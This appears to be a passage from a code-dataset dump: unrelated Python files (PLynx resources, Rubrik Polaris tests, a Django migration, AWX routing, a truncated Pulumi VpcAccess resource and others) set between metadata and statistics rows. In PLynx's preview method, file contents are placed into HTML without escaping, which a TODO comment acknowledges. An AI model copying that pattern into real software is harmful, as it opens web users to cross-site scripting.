] | 10 | 2019-01-11T21:51:14.000Z | 2020-01-30T01:29:22.000Z | plynx/base/resource.py | khaxis/plynx | 20768470261fc5f29cb660c815c479b49765b2fe | [
"Apache-2.0"
] | 11 | 2018-11-14T15:05:54.000Z | 2019-09-09T15:45:49.000Z | """Templates for PLynx Resources and utils."""
from collections import namedtuple
from typing import Dict
from plynx.constants import NodeResources
PreviewObject = namedtuple('PreviewObject', ['fp', 'resource_id'])
def _force_decode(byte_array):
    try:
        return byte_array.decode("utf-8")
    except UnicodeDecodeError:
        return f"# not a UTF-8 sequence:\n{byte_array}"
    return "Failed to decode the sequence"
class BaseResource:
    """Base Resource class"""
    DISPLAY_RAW: bool = False
    def __init__(self):
        pass
    @staticmethod
    def prepare_input(filename: str, preview: bool = False) -> Dict[str, str]: # pylint: disable=unused-argument
        """Resource preprocessor"""
        return {NodeResources.INPUT: filename}
    @staticmethod
    def prepare_output(filename: str, preview: bool = False) -> Dict[str, str]:
        """Prepare output"""
        if not preview:
            # Create file
            with open(filename, 'a'):
                pass
        return {NodeResources.OUTPUT: filename}
    @staticmethod
    def postprocess_output(filename: str) -> str:
        """Resource postprocessor"""
        return filename
    @classmethod
    def preview(cls, preview_object: PreviewObject) -> str:
        """Preview Resource"""
        # TODO escape html code for security reasons
        data = _force_decode(preview_object.fp.read())
        return f"<pre>{data}</pre>"
| 28.76 | 116 | 0.645341 | 158 | 1,438 | 5.759494 | 0.493671 | 0.02967 | 0.048352 | 0.048352 | 0.081319 | 0.081319 | 0.081319 | 0.081319 | 0 | 0 | 0 | 0.001845 | 0.246175 | 1,438 | 49 | 117 | 29.346939 | 0.837638 | 0.156467 | 0 | 0.166667 | 0 | 0 | 0.097458 | 0.019492 | 0 | 0 | 0 | 0.020408 | 0 | 1 | 0.2 | false | 0.066667 | 0.1 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
76f625a9aea0ade09d8888d306db58ebdb52aa50 | 4,866 | py | Python | tests/rubrik_polaris/sonar_scan_test.py | crestdatasystems/rubrik-polaris-sdk-for-python | ff0086ab7432db621a8ec89e1b5cba8d0caca7e2 | [
"MIT"
] | null | null | null | tests/rubrik_polaris/sonar_scan_test.py | crestdatasystems/rubrik-polaris-sdk-for-python | ff0086ab7432db621a8ec89e1b5cba8d0caca7e2 | [
"MIT"
] | null | null | null | tests/rubrik_polaris/sonar_scan_test.py | crestdatasystems/rubrik-polaris-sdk-for-python | ff0086ab7432db621a8ec89e1b5cba8d0caca7e2 | [
"MIT"
] | null | null | null | import os
import pytest
from conftest import util_load_json, BASE_URL
from rubrik_polaris.sonar.scan import ERROR_MESSAGES
FILE_TYPES = ['ANY', 'HITS', 'STALE', 'OPEN_ACCESS', 'STALE_HITS', 'OPEN_ACCESS_HITS']
@pytest.mark.parametrize("scan_name, resources, analyzer_groups", [
("", [{"snappableFid": "dummy_id"}], [{"id": "dummy_id"}]),
("scan_name", [], [{"id": "dummy_id"}]),
("scan_name", [{"snappableFid": "dummy_id"}], [])
])
def test_trigger_on_demand_scan_when_invalid_values_are_provided(client, scan_name, resources, analyzer_groups):
"""
Tests trigger_on_demand_scan method of PolarisClient when invalid values are provided
"""
from rubrik_polaris.sonar.scan import trigger_on_demand_scan
with pytest.raises(ValueError) as e:
trigger_on_demand_scan(client, scan_name=scan_name, resources=resources, analyzer_groups=analyzer_groups)
assert str(e.value) == ERROR_MESSAGES['MISSING_PARAMETERS_IN_SCAN']
def test_trigger_on_demand_scan_when_valid_values_are_provided(requests_mock, client):
"""
Tests trigger_on_demand_scan method of PolarisClient when valid values are provided
"""
from rubrik_polaris.sonar.scan import trigger_on_demand_scan
expected_response = util_load_json(os.path.join(os.path.dirname(os.path.realpath(__file__)),
"test_data/on_demand_scan.json"))
requests_mock.post(BASE_URL + "/graphql", json=expected_response)
scan_name = "Scan from SDK"
resources = [{"snappableFid": "dummy_id"}]
analyzer_groups = [{"id": "dummy_id", "name": "name", "groupType": "group_type", "analyzers": [{}]}]
response = trigger_on_demand_scan(
client, scan_name=scan_name, resources=resources, analyzer_groups=analyzer_groups)
assert response == expected_response
def test_get_on_demand_scan_status_when_valid_values_are_provided(requests_mock, client):
"""
Tests get_on_demand_scan_status method of PolarisClient when valid values are provided
"""
from rubrik_polaris.sonar.scan import get_on_demand_scan_status
expected_response = util_load_json(os.path.join(os.path.dirname(os.path.realpath(__file__)),
"test_data/on_demand_scan_status.json"))
requests_mock.post(BASE_URL + "/graphql", json=expected_response)
response = get_on_demand_scan_status(client, crawl_id="587d147a-add9-4152-b7a0-5a667d99f395")
assert response == expected_response
@pytest.mark.parametrize("crawl_id", [""])
def test_get_on_demand_scan_status_when_invalid_values_are_provided(client, crawl_id):
"""
Tests get_on_demand_scan_status method of PolarisClient when invalid values are provided
"""
from rubrik_polaris.sonar.scan import get_on_demand_scan_status
with pytest.raises(ValueError) as e:
get_on_demand_scan_status(client, crawl_id=crawl_id)
assert str(e.value) == ERROR_MESSAGES['MISSING_PARAMETERS_IN_SCAN_STATUS']
@pytest.mark.parametrize("crawl_id, filters, err_msg", [
("", {"fileType": "HITS"}, ERROR_MESSAGES['MISSING_PARAMETERS_IN_SCAN_RESULT']),
("scan_name", {}, ERROR_MESSAGES['MISSING_PARAMETERS_IN_SCAN_RESULT']),
("scan_name", {"fileType": "HIT"}, ERROR_MESSAGES['INVALID_FILE_TYPE'].format('HIT', FILE_TYPES))
])
def test_get_on_demand_scan_result_when_invalid_values_are_provided(client, crawl_id, filters, err_msg, requests_mock):
"""
Tests get_on_demand_scan_result method of PolarisClient when invalid values are provided
"""
from rubrik_polaris.sonar.scan import get_on_demand_scan_result
expected_response = util_load_json(
os.path.join(os.path.dirname(os.path.realpath(__file__)), "test_data/file_type_values.json")
)
requests_mock.post(BASE_URL + "/graphql", json=expected_response)
with pytest.raises(ValueError) as e:
get_on_demand_scan_result(client, crawl_id=crawl_id, filters=filters)
assert str(e.value) == err_msg
def test_get_on_demand_scan_result_when_valid_values_are_provided(requests_mock, client):
"""
Tests get_on_demand_scan_result method of PolarisClient when valid values are provided
"""
from rubrik_polaris.sonar.scan import get_on_demand_scan_result
query_response = util_load_json(os.path.join(os.path.dirname(os.path.realpath(__file__)),
"test_data/on_demand_scan_result.json"))
enum_response = util_load_json(
os.path.join(os.path.dirname(os.path.realpath(__file__)), "test_data/file_type_values.json")
)
responses = [
{'json': enum_response},
{'json': query_response}
]
requests_mock.post(BASE_URL + "/graphql", responses)
response = get_on_demand_scan_result(client, crawl_id="dummy_id", filters={"fileType": "HITS"})
assert response == query_response
| 43.061947 | 119 | 0.728935 | 648 | 4,866 | 5.050926 | 0.143519 | 0.065995 | 0.098992 | 0.073327 | 0.806599 | 0.743049 | 0.70608 | 0.68897 | 0.597311 | 0.53865 | 0 | 0.005387 | 0.160707 | 4,866 | 112 | 120 | 43.446429 | 0.796033 | 0.107069 | 0 | 0.298507 | 0 | 0 | 0.169723 | 0.076164 | 0 | 0 | 0 | 0 | 0.089552 | 1 | 0.089552 | false | 0 | 0.149254 | 0 | 0.238806 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
76f926951e7b3191305fab755280da429f174f8f | 1,403 | py | Python | user/migrations/0004_auto_20190705_1454.py | BreakUnrealGod/TanTan | 043454a76ee27d61e7d9aede7818f9127e34aaf2 | [
"MIT"
] | null | null | null | user/migrations/0004_auto_20190705_1454.py | BreakUnrealGod/TanTan | 043454a76ee27d61e7d9aede7818f9127e34aaf2 | [
"MIT"
] | 10 | 2019-12-04T23:38:04.000Z | 2022-02-10T09:53:59.000Z | swiper/user/migrations/0004_auto_20190705_1454.py | lijiaqipy/test1 | ab628a794ab67e153b929c819c876c5a676ab068 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.3 on 2019-07-05 14:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('user', '0003_auto_20190704_1547'),
]
operations = [
migrations.RenameField(
model_name='user',
old_name='birth_mohth',
new_name='birth_month',
),
migrations.RenameField(
model_name='user',
old_name='birth_yaer',
new_name='birth_year',
),
migrations.AlterField(
model_name='profile',
name='dating_sex',
field=models.IntegerField(choices=[(0, '全部'), (1, '男'), (2, '女')], default=0),
),
migrations.AlterField(
model_name='profile',
name='location',
field=models.CharField(choices=[('bj', '北京'), ('sz', '深圳'), ('sh', '上海'), ('gz', '广州'), ('cd', '成都'), ('dl', '大连')], max_length=64),
),
migrations.AlterField(
model_name='user',
name='location',
field=models.CharField(choices=[('bj', '北京'), ('sz', '深圳'), ('sh', '上海'), ('gz', '广州'), ('cd', '成都'), ('dl', '大连')], max_length=64),
),
migrations.AlterField(
model_name='user',
name='sex',
field=models.IntegerField(choices=[(0, '全部'), (1, '男'), (2, '女')], default=0),
),
]
| 31.886364 | 144 | 0.496793 | 146 | 1,403 | 4.636986 | 0.445205 | 0.079764 | 0.076809 | 0.171344 | 0.711965 | 0.711965 | 0.599705 | 0.599705 | 0.463811 | 0.463811 | 0 | 0.044284 | 0.307912 | 1,403 | 43 | 145 | 32.627907 | 0.652935 | 0.032074 | 0 | 0.648649 | 1 | 0 | 0.135693 | 0.016962 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.027027 | 0 | 0.108108 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
0a075be8805805fed40a5a0838052f57b229cf58 | 238 | py | Python | AtCoder/ABC029/C.py | takaaki82/Java-Lessons | c4f11462bf84c091527dde5f25068498bfb2cc49 | [
"MIT"
] | 1 | 2018-11-25T04:15:45.000Z | 2018-11-25T04:15:45.000Z | AtCoder/ABC029/C.py | takaaki82/Java-Lessons | c4f11462bf84c091527dde5f25068498bfb2cc49 | [
"MIT"
] | null | null | null | AtCoder/ABC029/C.py | takaaki82/Java-Lessons | c4f11462bf84c091527dde5f25068498bfb2cc49 | [
"MIT"
] | 2 | 2018-08-08T13:01:14.000Z | 2018-11-25T12:38:36.000Z | N = int(input())
def brute_force(s, remain):
if remain == 0:
print(s)
else:
brute_force(s + "a", remain - 1)
brute_force(s + "b", remain - 1)
brute_force(s + "c", remain - 1)
brute_force("", N)
| 17 | 40 | 0.508403 | 35 | 238 | 3.314286 | 0.457143 | 0.431034 | 0.37931 | 0.439655 | 0.310345 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024691 | 0.319328 | 238 | 13 | 41 | 18.307692 | 0.691358 | 0 | 0 | 0 | 0 | 0 | 0.012605 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0 | 0 | 0.111111 | 0.111111 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
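An equivalent non-recursive sketch of the enumeration above using itertools.product; it prints the same strings in the same lexicographic order and is only an alternative illustration, not part of the submitted solution.

from itertools import product

def brute_force_iterative(n):
    # product("abc", repeat=n) walks every length-n string over {a, b, c}
    # in the same depth-first (lexicographic) order as the recursion above.
    for chars in product("abc", repeat=n):
        print("".join(chars))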
0a0766ccdfab40edb3131b5ef4903ea06f8f355a | 396 | py | Python | dazu/training_data/reader.py | Dazu-io/dazu | 064a7fd91961bdf372868e7b0a106102e9fc058b | [
"Apache-2.0"
] | 2 | 2020-03-14T18:17:08.000Z | 2020-07-10T01:05:52.000Z | dazu/training_data/reader.py | Dazu-io/dazu | 064a7fd91961bdf372868e7b0a106102e9fc058b | [
"Apache-2.0"
] | 41 | 2020-01-20T22:30:08.000Z | 2020-02-21T19:46:52.000Z | dazu/training_data/reader.py | Dazu-io/dazu | 064a7fd91961bdf372868e7b0a106102e9fc058b | [
"Apache-2.0"
] | 3 | 2019-03-15T17:56:04.000Z | 2020-01-17T20:29:37.000Z | from abc import abstractmethod
from typing import Dict
from dazu.config import DazuConfig
from dazu.registry import Module
from dazu.typing import TrainingData
class Reader(Module):
@classmethod
@abstractmethod
def load(cls, config: DazuConfig) -> TrainingData:
pass
@classmethod
def validate_data(cls, config: DazuConfig, data: Dict) -> bool:
return True
| 22 | 67 | 0.729798 | 47 | 396 | 6.12766 | 0.510638 | 0.083333 | 0.131944 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.207071 | 396 | 17 | 68 | 23.294118 | 0.917197 | 0 | 0 | 0.153846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0.076923 | 0.384615 | 0.076923 | 0.692308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 3 |
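A minimal sketch of a concrete Reader built on the base class above; JsonReader and the training_data_path attribute on DazuConfig are illustrative assumptions, not names taken from the dazu codebase.

import json

from dazu.config import DazuConfig
from dazu.training_data.reader import Reader
from dazu.typing import TrainingData

class JsonReader(Reader):
    """Illustrative reader that loads training data from a JSON file."""

    @classmethod
    def load(cls, config: DazuConfig) -> TrainingData:
        # `training_data_path` is an assumed attribute on DazuConfig.
        with open(config.training_data_path) as fp:
            return json.load(fp)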
0a14f4c1f0df038c2f10a10238e8e6670db20514 | 1,388 | py | Python | src/ZServer/Zope2/Startup/__init__.py | datakurre/ZServer | 9aa87900463229350f691f1c8877c6e8f13538c8 | [
"ZPL-2.1"
] | 1 | 2019-06-14T15:39:18.000Z | 2019-06-14T15:39:18.000Z | src/ZServer/Zope2/Startup/__init__.py | datakurre/ZServer | 9aa87900463229350f691f1c8877c6e8f13538c8 | [
"ZPL-2.1"
] | null | null | null | src/ZServer/Zope2/Startup/__init__.py | datakurre/ZServer | 9aa87900463229350f691f1c8877c6e8f13538c8 | [
"ZPL-2.1"
] | null | null | null | ##############################################################################
#
# Copyright (c) 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
from __future__ import absolute_import
import sys
# The default async io event loop and twisted reactor can only be
# set once. Therefore they must be set as early as possible.
try:
import uvloop
uvloop.install()
except ImportError:
pass
from twisted.internet.error import ReactorAlreadyInstalledError
try:
import twisted.internet.asyncioreactor
twisted.internet.asyncioreactor.install()
except (ImportError, ReactorAlreadyInstalledError):
pass
def get_starter():
if sys.platform[:3].lower() == "win":
from ZServer.Zope2.Startup.starter import WindowsZopeStarter
return WindowsZopeStarter()
else:
from ZServer.Zope2.Startup.starter import UnixZopeStarter
return UnixZopeStarter()
| 31.545455 | 78 | 0.669308 | 155 | 1,388 | 5.954839 | 0.625806 | 0.048754 | 0.030336 | 0.049837 | 0.078007 | 0.078007 | 0 | 0 | 0 | 0 | 0 | 0.007732 | 0.161383 | 1,388 | 43 | 79 | 32.27907 | 0.785223 | 0.416427 | 0 | 0.2 | 0 | 0 | 0.004688 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | true | 0.1 | 0.45 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 3 |
0a45e19210e3f8fd15ff3b6f8f8ce4c6ca714738 | 16 | py | Python | chabie/__init__.py | TatchNicolas/chabie | 6650da8d34341e181a3ae3d47e76c024bcc0a8dc | [
"MIT"
] | 2 | 2018-12-04T01:40:54.000Z | 2019-01-29T05:05:20.000Z | chabie/__init__.py | TatchNicolas/chabie | 6650da8d34341e181a3ae3d47e76c024bcc0a8dc | [
"MIT"
] | 3 | 2020-03-24T16:28:22.000Z | 2021-02-02T22:06:47.000Z | chabie/__init__.py | TatchNicolas/chabie | 6650da8d34341e181a3ae3d47e76c024bcc0a8dc | [
"MIT"
] | null | null | null | name = 'chabie'
| 8 | 15 | 0.625 | 2 | 16 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1875 | 16 | 1 | 16 | 16 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
0a49f25c6cb66c0881a569ced7bd0a0345534fa0 | 329 | py | Python | awx/main/routing.py | gitEdouble/awx | 5885654405ccaf465f08df4db998a6dafebd9b4d | [
"Apache-2.0"
] | 2 | 2018-11-12T18:52:24.000Z | 2020-05-22T18:41:21.000Z | awx/main/routing.py | gitEdouble/awx | 5885654405ccaf465f08df4db998a6dafebd9b4d | [
"Apache-2.0"
] | 4 | 2020-04-29T23:03:16.000Z | 2022-03-01T23:56:09.000Z | awx/main/routing.py | gitEdouble/awx | 5885654405ccaf465f08df4db998a6dafebd9b4d | [
"Apache-2.0"
] | 9 | 2019-05-11T00:03:30.000Z | 2021-07-07T16:09:17.000Z | from channels.routing import route
channel_routing = [
route("websocket.connect", "awx.main.consumers.ws_connect", path=r'^/websocket/$'),
route("websocket.disconnect", "awx.main.consumers.ws_disconnect", path=r'^/websocket/$'),
route("websocket.receive", "awx.main.consumers.ws_receive", path=r'^/websocket/$'),
]
| 36.555556 | 93 | 0.711246 | 40 | 329 | 5.75 | 0.4 | 0.182609 | 0.208696 | 0.234783 | 0.243478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094225 | 329 | 8 | 94 | 41.125 | 0.771812 | 0 | 0 | 0 | 0 | 0 | 0.556231 | 0.273556 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
0a4a7c2e881ce42dc6e0b95e826eb31368ac6e12 | 2,232 | py | Python | py_client/aidm/aidm_track_closure_classes.py | sma-software/openviriato.algorithm-platform.py-client | 73d4cf89aa6f4d02ab15b5504d92107848742325 | [
"Apache-2.0"
] | 2 | 2021-06-21T06:50:29.000Z | 2021-06-30T15:58:02.000Z | py_client/aidm/aidm_track_closure_classes.py | sma-software/openviriato.algorithm-platform.py-client | 73d4cf89aa6f4d02ab15b5504d92107848742325 | [
"Apache-2.0"
] | null | null | null | py_client/aidm/aidm_track_closure_classes.py | sma-software/openviriato.algorithm-platform.py-client | 73d4cf89aa6f4d02ab15b5504d92107848742325 | [
"Apache-2.0"
] | null | null | null | from py_client.aidm.aidm_base_classes import _HasDebugString
from py_client.aidm.aidm_time_window_classes import TimeWindow
class AlgorithmNodeTrackClosure(_HasDebugString):
__node_id: int
__node_track_id: int
__closure_time_window: TimeWindow
def __init__(self, debug_string: str, node_id: int, node_track_id: int, closure_time_window: TimeWindow):
_HasDebugString.__init__(self, debug_string)
self.__closure_time_window = closure_time_window
self.__node_id = node_id
self.__node_track_id = node_track_id
@property
def node_id(self) -> int:
return self.__node_id
@property
def node_track_id(self) -> int:
return self.__node_track_id
@property
def closure_time_window(self) -> TimeWindow:
return self.__closure_time_window
class AlgorithmSectionTrackClosure(_HasDebugString):
__section_track_id: int
__from_node_id: int
__to_node_id: int
__closure_time_window_from_node: TimeWindow
__closure_time_window_to_node: TimeWindow
def __init__(
self,
debug_string: str,
section_track_id: int,
from_node_id: int,
to_node_id: int,
closure_time_window_from_node: TimeWindow,
closure_time_window_to_node: TimeWindow):
_HasDebugString.__init__(self, debug_string)
self.__section_track_id = section_track_id
self.__from_node_id = from_node_id
self.__to_node_id = to_node_id
self.__closure_time_window_from_node = closure_time_window_from_node
self.__closure_time_window_to_node = closure_time_window_to_node
@property
def section_track_id(self) -> int:
return self.__section_track_id
@property
def from_node_id(self) -> int:
return self.__from_node_id
@property
def to_node_id(self) -> int:
return self.__to_node_id
@property
def closure_time_window_from_node(self) -> TimeWindow:
return self.__closure_time_window_from_node
@property
def closure_time_window_to_node(self) -> TimeWindow:
return self.__closure_time_window_to_node
| 31.885714 | 110 | 0.697133 | 281 | 2,232 | 4.846975 | 0.103203 | 0.139501 | 0.22467 | 0.092511 | 0.717327 | 0.629222 | 0.420705 | 0.299559 | 0.23348 | 0.23348 | 0 | 0 | 0.247312 | 2,232 | 69 | 111 | 32.347826 | 0.810714 | 0 | 0 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.036364 | 0.145455 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
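A construction sketch for the closure classes above; the IDs are placeholders and the TimeWindow keyword arguments (from_time/to_time) are an assumption about aidm_time_window_classes, so adjust them to the real signature.

from datetime import datetime

from py_client.aidm.aidm_time_window_classes import TimeWindow
from py_client.aidm.aidm_track_closure_classes import AlgorithmNodeTrackClosure

# Assumed TimeWindow signature and placeholder IDs, for illustration only.
window = TimeWindow(from_time=datetime(2003, 5, 1, 8, 0), to_time=datetime(2003, 5, 1, 10, 0))
closure = AlgorithmNodeTrackClosure(
    debug_string="closure on node 162, track 1",
    node_id=162,
    node_track_id=1,
    closure_time_window=window,
)
print(closure.node_id, closure.closure_time_window)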
0a6077624e8a5eec68b3d6b8f51513c0ebaf50fb | 1,280 | py | Python | Android/parser/ui/images/encode_bitmaps.py | Bravest-Ptt/Useful-Shell | 75016ff44f218afce6b885af7b23fb801a7ef2d4 | [
"Apache-2.0"
] | 1 | 2020-05-31T08:46:45.000Z | 2020-05-31T08:46:45.000Z | Android/parser/ui/images/encode_bitmaps.py | Bravest-Ptt/Useful-Shell | 75016ff44f218afce6b885af7b23fb801a7ef2d4 | [
"Apache-2.0"
] | null | null | null | Android/parser/ui/images/encode_bitmaps.py | Bravest-Ptt/Useful-Shell | 75016ff44f218afce6b885af7b23fb801a7ef2d4 | [
"Apache-2.0"
] | null | null | null |
"""
This is a way to save the startup time when running img2py on lots of
files...
"""
import sys
from wx.tools import img2py
command_lines = [
" -F -n action_clean_history action_clean_history.png images.py",
"-a -F -n action_new action_new.png images.py",
"-a -F -n app_splash app_splash.png images.py",
"-a -F -n web_service_error web_service_error.png images.py",
"-a -F -n web_service_info web_service_info.png images.py",
"-a -F -n web_service_success web_service_success.png images.py",
"-a -F -n task_done task_done.png images.py",
"-a -F -n task_process task_process.png images.py",
"-a -F -n task_paused task_paused.png images.py",
"-a -F -n task_waiting task_waiting.png images.py",
"-a -F -n task_generating task_generating.png images.py"
]
if __name__ == "__main__":
for line in command_lines:
args = line.split()
img2py.main(args)
| 42.666667 | 92 | 0.489844 | 156 | 1,280 | 3.762821 | 0.339744 | 0.037479 | 0.206133 | 0.204429 | 0.32368 | 0.32368 | 0.27598 | 0.122658 | 0 | 0 | 0 | 0.00406 | 0.422656 | 1,280 | 29 | 93 | 44.137931 | 0.790257 | 0.060938 | 0 | 0 | 0 | 0 | 0.782718 | 0.057047 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.105263 | 0 | 0.105263 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
0a6611331aec5272182cb56364fda31f43b05983 | 11,288 | py | Python | sdk/python/pulumi_alicloud/apigateway/vpc_access.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 42 | 2019-03-18T06:34:37.000Z | 2022-03-24T07:08:57.000Z | sdk/python/pulumi_alicloud/apigateway/vpc_access.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 152 | 2019-04-15T21:03:44.000Z | 2022-03-29T18:00:57.000Z | sdk/python/pulumi_alicloud/apigateway/vpc_access.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 3 | 2020-08-26T17:30:07.000Z | 2021-07-05T01:37:45.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['VpcAccessArgs', 'VpcAccess']
@pulumi.input_type
class VpcAccessArgs:
def __init__(__self__, *,
instance_id: pulumi.Input[str],
port: pulumi.Input[int],
vpc_id: pulumi.Input[str],
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a VpcAccess resource.
:param pulumi.Input[str] instance_id: ID of the instance in VPC (ECS/Server Load Balance).
:param pulumi.Input[int] port: ID of the port corresponding to the instance.
:param pulumi.Input[str] vpc_id: The vpc id of the vpc authorization.
:param pulumi.Input[str] name: The name of the vpc authorization.
"""
pulumi.set(__self__, "instance_id", instance_id)
pulumi.set(__self__, "port", port)
pulumi.set(__self__, "vpc_id", vpc_id)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> pulumi.Input[str]:
"""
ID of the instance in VPC (ECS/Server Load Balance).
"""
return pulumi.get(self, "instance_id")
@instance_id.setter
def instance_id(self, value: pulumi.Input[str]):
pulumi.set(self, "instance_id", value)
@property
@pulumi.getter
def port(self) -> pulumi.Input[int]:
"""
ID of the port corresponding to the instance.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: pulumi.Input[int]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> pulumi.Input[str]:
"""
The vpc id of the vpc authorization.
"""
return pulumi.get(self, "vpc_id")
@vpc_id.setter
def vpc_id(self, value: pulumi.Input[str]):
pulumi.set(self, "vpc_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the vpc authorization.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _VpcAccessState:
def __init__(__self__, *,
instance_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
vpc_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering VpcAccess resources.
:param pulumi.Input[str] instance_id: ID of the instance in VPC (ECS/Server Load Balance).
:param pulumi.Input[str] name: The name of the vpc authorization.
:param pulumi.Input[int] port: ID of the port corresponding to the instance.
:param pulumi.Input[str] vpc_id: The vpc id of the vpc authorization.
"""
if instance_id is not None:
pulumi.set(__self__, "instance_id", instance_id)
if name is not None:
pulumi.set(__self__, "name", name)
if port is not None:
pulumi.set(__self__, "port", port)
if vpc_id is not None:
pulumi.set(__self__, "vpc_id", vpc_id)
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the instance in VPC (ECS/Server Load Balance).
"""
return pulumi.get(self, "instance_id")
@instance_id.setter
def instance_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "instance_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
